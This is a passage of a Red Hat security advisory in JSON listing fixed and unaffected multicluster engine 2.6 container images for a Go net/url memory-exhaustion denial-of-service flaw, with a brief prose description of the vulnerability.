2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2434432"}], "notes": [{"category": "description", "text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.", "title": "Vulnerability description"}, {"category": "summary", "text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url", "title": "Vulnerability summary"}, {"category": "other", "text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64"], "known_not_affected": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 